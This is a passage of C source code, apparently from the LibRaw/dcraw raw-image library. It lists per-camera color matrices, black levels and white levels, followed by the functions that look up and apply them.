{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "OmniVision", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Pentax *ist DL2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DL", 0, 0,
{ 10829,-2838,-1115,-8339,15817,2696,-837,680,11939 } },
{ "Pentax *ist DS2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DS", 0, 0,
{ 10371,-2333,-1206,-8688,16231,2602,-1230,1116,11282 } },
{ "Pentax *ist D", 0, 0,
{ 9651,-2059,-1189,-8881,16512,2487,-1460,1345,10687 } },
{ "Pentax K10D", 0, 0,
{ 9566,-2863,-803,-7170,15172,2112,-818,803,9705 } },
{ "Pentax K1", 0, 0,
{ 11095,-3157,-1324,-8377,15834,2720,-1108,947,11688 } },
{ "Pentax K20D", 0, 0,
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Pentax K200D", 0, 0,
{ 9186,-2678,-907,-8693,16517,2260,-1129,1094,8524 } },
{ "Pentax K2000", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-m", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-x", 0, 0,
{ 8843,-2837,-625,-5025,12644,2668,-411,1234,7410 } },
{ "Pentax K-r", 0, 0,
{ 9895,-3077,-850,-5304,13035,2521,-883,1768,6936 } },
{ "Pentax K-1", 0, 0,
{ 8566,-2746,-1201,-3612,12204,1550,-893,1680,6264 } },
{ "Pentax K-30", 0, 0,
{ 8710,-2632,-1167,-3995,12301,1881,-981,1719,6535 } },
{ "Pentax K-3 II", 0, 0,
{ 8626,-2607,-1155,-3995,12301,1881,-1039,1822,6925 } },
{ "Pentax K-3", 0, 0,
{ 7415,-2052,-721,-5186,12788,2682,-1446,2157,6773 } },
{ "Pentax K-5 II", 0, 0,
{ 8170,-2725,-639,-4440,12017,2744,-771,1465,6599 } },
{ "Pentax K-5", 0, 0,
{ 8713,-2833,-743,-4342,11900,2772,-722,1543,6247 } },
{ "Pentax K-70", 0, 0,
{8766, -3149, -747, -3976, 11943, 2292, -517, 1259, 5552 }},
{ "Pentax K-7", 0, 0,
{ 9142,-2947,-678,-8648,16967,1663,-2224,2898,8615 } },
{ "Pentax K-S1", 0, 0,
{ 8512,-3211,-787,-4167,11966,2487,-638,1288,6054 } },
{ "Pentax K-S2", 0, 0,
{ 8662,-3280,-798,-3928,11771,2444,-586,1232,6054 } },
{ "Pentax Q-S1", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax MX-1", 0, 0,
{ 8804,-2523,-1238,-2423,11627,860,-682,1774,4753 } },
{ "Pentax Q10", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax 645D", 0, 0x3e00,
{ 10646,-3593,-1158,-3329,11699,1831,-667,2874,6287 } },
{ "Pentax 645Z", 0, 0, /* Adobe */
{ 9702, -3060, -1254, -3685, 12133, 1721, -1086, 2010, 6971}},
{ "Panasonic DMC-CM10", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-CM1", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-FZ8", 0, 0xf7f,
{ 8986,-2755,-802,-6341,13575,3077,-1476,2144,6379 } },
{ "Panasonic DMC-FZ18", 0, 0,
{ 9932,-3060,-935,-5809,13331,2753,-1267,2155,5575 } },
{ "Panasonic DMC-FZ28", -15, 0xf96,
{ 10109,-3488,-993,-5412,12812,2916,-1305,2140,5543 } },
{ "Panasonic DMC-FZ300", -15, 0xfff,
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ330", -15, 0xfff, // same as FZ300
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ30", 0, 0xf94,
{ 10976,-4029,-1141,-7918,15491,2600,-1670,2071,8246 } },
{ "Panasonic DMC-FZ3", -15, 0,
{ 9938,-2780,-890,-4604,12393,2480,-1117,2304,4620 } },
{ "Panasonic DMC-FZ4", -15, 0,
{ 13639,-5535,-1371,-1698,9633,2430,316,1152,4108 } },
{ "Panasonic DMC-FZ50", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-FZ7", -15, 0,
{ 11532,-4324,-1066,-2375,10847,1749,-564,1699,4351 } },
{ "Leica V-LUX1", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-L10", -15, 0xf96,
{ 8025,-1942,-1050,-7920,15904,2100,-2456,3005,7039 } },
{ "Panasonic DMC-L1", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Leica DIGILUX 3", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Panasonic DMC-LC1", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Leica DIGILUX 2", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Panasonic DMC-LX100", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX (Typ 109)", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Panasonic DMC-LF1", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Leica C (Typ 112)", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Panasonic DMC-LX9", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX10", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX15", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX1", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Leica D-Lux (Typ 109)", 0, 0xf7f,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX2", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Panasonic DMC-LX2", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Leica D-LUX3", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Panasonic DMC-LX3", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Leica D-LUX 4", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Panasonic DMC-LX5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Leica D-LUX 5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Panasonic DMC-LX7", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Leica D-LUX 6", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Panasonic DMC-FZ1000", -15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Leica V-LUX (Typ 114)", 15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Panasonic DMC-FZ100", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Leica V-LUX 2", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Panasonic DMC-FZ150", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Leica V-LUX 3", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Panasonic DMC-FZ2000", -15, 0, /* markets: DMC-FZ2000,DMC-FZ2500,FZH1 */
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ2500", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZH1", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ200", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Leica V-LUX 4", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Panasonic DMC-FX150", -15, 0xfff,
{ 9082,-2907,-925,-6119,13377,3058,-1797,2641,5609 } },
{ "Panasonic DMC-G10", 0, 0,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G1", -15, 0xf94,
{ 8199,-2065,-1056,-8124,16156,2033,-2458,3022,7220 } },
{ "Panasonic DMC-G2", -15, 0xf3c,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G3", -15, 0xfff,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-G5", -15, 0xfff,
{ 7798,-2562,-740,-3879,11584,2613,-1055,2248,5434 } },
{ "Panasonic DMC-G6", -15, 0xfff,
{ 8294,-2891,-651,-3869,11590,2595,-1183,2267,5352 } },
{ "Panasonic DMC-G7", -15, 0xfff,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-G8", -15, 0xfff, /* markets: DMC-G8, DMC-G80, DMC-G81, DMC-G85 */
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF1", -15, 0xf92,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF2", -15, 0xfff,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF3", -15, 0xfff,
{ 9051,-2468,-1204,-5212,13276,2121,-1197,2510,6890 } },
{ "Panasonic DMC-GF5", -15, 0xfff,
{ 8228,-2945,-660,-3938,11792,2430,-1094,2278,5793 } },
{ "Panasonic DMC-GF6", -15, 0,
{ 8130,-2801,-946,-3520,11289,2552,-1314,2511,5791 } },
{ "Panasonic DMC-GF7", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF8", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GH1", -15, 0xf92,
{ 6299,-1466,-532,-6535,13852,2969,-2331,3112,5984 } },
{ "Panasonic DMC-GH2", -15, 0xf95,
{ 7780,-2410,-806,-3913,11724,2484,-1018,2390,5298 } },
{ "Panasonic DMC-GH3", -15, 0,
{ 6559,-1752,-491,-3672,11407,2586,-962,1875,5130 } },
{ "Panasonic DMC-GH4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Yuneec CGO4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Panasonic DMC-GM1", -15, 0,
{ 6770,-1895,-744,-5232,13145,2303,-1664,2691,5703 } },
{ "Panasonic DMC-GM5", -15, 0,
{ 8238,-3244,-679,-3921,11814,2384,-836,2022,5852 } },
{ "Panasonic DMC-GX1", -15, 0,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-GX85", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX80", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7MK2", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7", -15,0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GX8", -15,0,
{ 7564,-2263,-606,-3148,11239,2177,-540,1435,4853 } },
{ "Panasonic DMC-TZ6", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ8", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS4", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ7", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS5", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS6", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-ZS110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ101", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TX1", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Leica S (Typ 007)", 0, 0,
{ 6063,-2234,-231,-5210,13787,1500,-1043,2866,6997 } },
{ "Leica X", 0, 0, /* X and X-U, both (Typ 113) */
{ 7712,-2059,-653,-3882,11494,2726,-710,1332,5958 } },
{ "Leica Q (Typ 116)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830 } },
{ "Leica M (Typ 262)", 0, 0,
{ 6653,-1486,-611,-4221,13303,929,-881,2416,7226 } },
{ "Leica SL (Typ 601)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830} },
{ "Phase One H 20", 0, 0, /* DJC */
{ 1313,1855,-109,-6715,15908,808,-327,1840,6020 } },
{ "Phase One H 25", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One IQ250",0, 0,
{ 4396,-153,-249,-5267,12249,2657,-1397,2323,6014 } },
{ "Phase One P 2", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One P 30", 0, 0,
{ 4516,-245,-37,-7020,14976,2173,-3206,4671,7087 } },
{ "Phase One P 45", 0, 0,
{ 5053,-24,-117,-5684,14076,1702,-2619,4492,5849 } },
{ "Phase One P40", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Phase One P65", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Photron BC2-HD", 0, 0, /* DJC */
{ 14603,-4122,-528,-1810,9794,2017,-297,2763,5936 } },
{ "Red One", 704, 0xffff, /* DJC */
{ 21014,-7891,-2613,-3056,12201,856,-2203,5125,8042 } },
{ "Ricoh GR II", 0, 0,
{ 4630,-834,-423,-4977,12805,2417,-638,1467,6115 } },
{ "Ricoh GR", 0, 0,
{ 3708,-543,-160,-5381,12254,3556,-1471,1929,8234 } },
{ "Samsung EK-GN120", 0, 0, /* Adobe; Galaxy NX */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung EX1", 0, 0x3e00,
{ 8898,-2498,-994,-3144,11328,2066,-760,1381,4576 } },
{ "Samsung EX2F", 0, 0x7ff,
{ 10648,-3897,-1055,-2022,10573,1668,-492,1611,4742 } },
{ "Samsung NX mini", 0, 0,
{ 5222,-1196,-550,-6540,14649,2009,-1666,2819,5657 } },
{ "Samsung NX3300", 0, 0, /* same as NX3000 */
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX3000", 0, 0,
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX30", 0, 0, /* NX30, NX300, NX300M */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2000", 0, 0,
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2", 0, 0xfff, /* NX20, NX200, NX210 */
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1000", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1100", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX11", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX10", 0, 0, /* also NX100 */
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX500", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung NX5", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX1", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung WB2000", 0, 0xfff,
{ 12093,-3557,-1155,-1000,9534,1733,-22,1787,4576 } },
{ "Samsung GX-1", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Samsung GX20", 0, 0, /* copied from Pentax K20D */
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Samsung S85", 0, 0, /* DJC */
{ 11885,-3968,-1473,-4214,12299,1916,-835,1655,5549 } },
// Foveon: LibRaw color data
{ "Sigma dp0 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp1 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp2 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp3 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma sd Quattro H", 256, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp, same as sd Quattro */
{ "Sigma sd Quattro", 2047, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp */
{ "Sigma SD9", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD10", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD14", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD15", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
// Merills + SD1
{ "Sigma SD1", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP1 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP2 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP3 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
// Sigma DP (non-Merill Versions)
{ "Sigma DP", 0, 4095, /* LibRaw */
// { 7401,-1169,-567,2059,3769,1510,664,3367,5328 } },
{ 13100,-3638,-847,6855,2369,580,2723,3218,3251 } },
{ "Sinar", 0, 0, /* DJC */
{ 16442,-2956,-2422,-2877,12128,750,-1136,6066,4559 } },
{ "Sony DSC-F828", 0, 0,
{ 7924,-1910,-777,-8226,15459,2998,-1517,2199,6818,-7242,11401,3481 } },
{ "Sony DSC-R1", 0, 0,
{ 8512,-2641,-694,-8042,15670,2526,-1821,2117,7414 } },
{ "Sony DSC-V3", 0, 0,
{ 7511,-2571,-692,-7894,15088,3060,-948,1111,8128 } },
{"Sony DSC-RX100M5", -800, 0, /* Adobe */
{6596, -2079, -562, -4782, 13016, 1933, -970, 1581, 5181 }},
{ "Sony DSC-RX100M", -800, 0, /* M2 and M3 and M4 */
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Sony DSC-RX100", 0, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Sony DSC-RX10",0, 0, /* And M2/M3 too */
{ 6679,-1825,-745,-5047,13256,1953,-1580,2422,5183 } },
{ "Sony DSC-RX1RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony DSC-RX1R", 0, 0,
{ 8195,-2800,-422,-4261,12273,1709,-1505,2400,5624 } },
{ "Sony DSC-RX1", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
{ "Sony DSLR-A100", 0, 0xfeb,
{ 9437,-2811,-774,-8405,16215,2290,-710,596,7181 } },
{ "Sony DSLR-A290", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A2", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A300", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A330", 0, 0,
{ 9847,-3091,-929,-8485,16346,2225,-714,595,7103 } },
{ "Sony DSLR-A350", 0, 0xffc,
{ 6038,-1484,-578,-9146,16746,2513,-875,746,7217 } },
{ "Sony DSLR-A380", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A390", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A450", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A580", 0, 0xfeb,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony DSLR-A500", 0, 0xfeb,
{ 6046,-1127,-278,-5574,13076,2786,-691,1419,7625 } },
{ "Sony DSLR-A5", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A700", 0, 0,
{ 5775,-805,-359,-8574,16295,2391,-1943,2341,7249 } },
{ "Sony DSLR-A850", 0, 0,
{ 5413,-1162,-365,-5665,13098,2866,-608,1179,8440 } },
{ "Sony DSLR-A900", 0, 0,
{ 5209,-1072,-397,-8845,16120,2919,-1618,1803,8654 } },
{ "Sony ILCA-68", 0, 0,
{ 6435,-1903,-536,-4722,12449,2550,-663,1363,6517 } },
{ "Sony ILCA-77M2", 0, 0,
{ 5991,-1732,-443,-4100,11989,2381,-704,1467,5992 } },
{ "Sony ILCA-99M2", 0, 0, /* Adobe */
{ 6660, -1918, -471, -4613, 12398, 2485, -649, 1433, 6447}},
{ "Sony ILCE-7M2", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-7SM2", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7S", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony ILCE-7R", 0, 0,
{ 4913,-541,-202,-6130,13513,2906,-1564,2151,7183 } },
{ "Sony ILCE-7", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-6300", 0, 0,
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE-6500", 0, 0, /* Adobe */
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE", 0, 0, /* 3000, 5000, 5100, 6000, and QX1 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5N", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5R", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-5T", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3N", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-5", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-6", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-7", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony NEX", 0, 0, /* NEX-C3, NEX-F3 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A33", 0, 0,
{ 6069,-1221,-366,-5221,12779,2734,-1024,2066,6834 } },
{ "Sony SLT-A35", 0, 0,
{ 5986,-1618,-415,-4557,11820,3120,-681,1404,6971 } },
{ "Sony SLT-A37", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A55", 0, 0,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony SLT-A57", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A58", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A65", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A77", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A99", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
};
double cam_xyz[4][3];
char name[130];
int i, j;
if(colors>4 || colors < 1) return;
int bl4=(cblack[0]+cblack[1]+cblack[2]+cblack[3])/4,bl64=0;
if(cblack[4]*cblack[5]>0)
{
for (unsigned c = 0; c < 4096 && c < cblack[4]*cblack[5]; c++)
bl64+=cblack[c+6];
bl64 /= cblack[4]*cblack[5];
}
int rblack = black+bl4+bl64;
sprintf (name, "%s %s", t_make, t_model);
for (i=0; i < sizeof table / sizeof *table; i++)
if (!strncasecmp(name, table[i].prefix, strlen(table[i].prefix))) {
if(!dng_version)
{
if (table[i].t_black>0)
{
black = (ushort) table[i].t_black;
memset(cblack,0,sizeof(cblack));
}
else if(table[i].t_black <0 && rblack == 0 )
{
black = (ushort) (-table[i].t_black);
memset(cblack,0,sizeof(cblack));
}
if (table[i].t_maximum)
maximum = (ushort) table[i].t_maximum;
}
if (table[i].trans[0]) {
for (raw_color = j=0; j < 12; j++)
#ifdef LIBRAW_LIBRARY_BUILD
if(internal_only)
imgdata.color.cam_xyz[0][j] = table[i].trans[j] / 10000.0;
else
imgdata.color.cam_xyz[0][j] =
#endif
((double*)cam_xyz)[j] = table[i].trans[j] / 10000.0;
#ifdef LIBRAW_LIBRARY_BUILD
if(!internal_only)
#endif
cam_xyz_coeff (rgb_cam, cam_xyz);
}
break;
}
}
void CLASS simple_coeff (int index)
{
static const float table[][12] = {
/* index 0 -- all Foveon cameras */
{ 1.4032,-0.2231,-0.1016,-0.5263,1.4816,0.017,-0.0112,0.0183,0.9113 },
/* index 1 -- Kodak DC20 and DC25 */
{ 2.25,0.75,-1.75,-0.25,-0.25,0.75,0.75,-0.25,-0.25,-1.75,0.75,2.25 },
/* index 2 -- Logitech Fotoman Pixtura */
{ 1.893,-0.418,-0.476,-0.495,1.773,-0.278,-1.017,-0.655,2.672 },
/* index 3 -- Nikon E880, E900, and E990 */
{ -1.936280, 1.800443, -1.448486, 2.584324,
1.405365, -0.524955, -0.289090, 0.408680,
-1.204965, 1.082304, 2.941367, -1.818705 }
};
int i, c;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[index][i*colors+c];
}
short CLASS guess_byte_order (int words)
{
uchar test[4][2];
int t=2, msb;
double diff, sum[2] = {0,0};
fread (test[0], 2, 2, ifp);
for (words-=2; words--; ) {
